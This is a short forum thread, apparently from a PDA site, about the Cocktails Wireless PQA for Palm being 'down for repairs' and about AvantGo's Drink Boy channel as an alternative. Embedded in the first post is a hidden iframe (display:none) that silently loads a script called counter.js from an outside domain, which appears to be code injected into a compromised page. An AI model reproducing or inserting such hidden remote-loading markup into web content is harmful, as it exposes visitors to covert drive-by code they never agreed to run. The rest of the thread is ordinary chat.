+ Reply to Thread

Cocktails Wireless PQA

Okay, since I downloaded the Cocktails Wireless PQA yesterday, I haven't been able to sign on - I just keep getting the message "down for service." Has anyone else used this recently? I'm just curious if it's still being supported?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

It must just be a temporary thing, because I just tried it right now and also got, "Sorry, we're down for repairs", but I used to use it all the time, so hopefully it will be up again soon.
    ~'kito
    pdaPhoneHome Moderator

Well... they're still "down for repairs". Its been 3 days now. I'm thinking maybe the PQA may no longer be supported. Or... all the tech people are down on the ground passed out from testing all their drink recipes! :drink3

Well, it looks like this PQA is no longer being supported. That's too bad, as it would be nice to play bartender and know how to make just about any drink.

Oh well, if anyone hears that it's back up, please let us know!

Still down. What a buzz kill.
    ~'kito
    pdaPhoneHome Moderator

:drummer
    iPhone therefore iAm.

cocktails for the palm

I know that this is not the same as a pqa, but I use AvantGo (free service, as I'm sure most of you know). There is a channel called Drink Boy. This has worked great for me thus far when I needed to know what goes into a drink.

Thought I'd share

Re: cocktails for the palm

Thanks for the link! As you might guess, I'm not a 12 step program graduate.

Originally posted by soup
    I know that this is not the same as a pqa, but I use AvantGo (free service, as I'm sure most of you know). There is a channel called Drink Boy. This has worked great for me thus far when I needed to know what goes into a drink.

Thought I'd share